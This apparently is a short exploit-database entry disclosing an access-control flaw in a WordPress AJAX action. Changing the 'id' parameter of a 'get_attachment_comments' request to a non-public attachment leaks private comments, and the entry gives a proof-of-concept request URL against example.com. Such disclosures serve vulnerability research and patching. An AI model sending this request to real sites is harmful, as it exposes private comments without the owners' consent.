## https://sploitus.com/exploit?id=WPEX-ID:08A8A51C-49D3-4BCE-B7E0-E365AF1D8F33
By changing the "id" parameter of the POST request to a valid media attachment id on a page/post that was not public, it was possible to leak the non-public comments.
http://example.com/wp-admin/admin-ajax.php?action=get_attachment_comments&nonce=4aadefa6ee&id=28&offset=0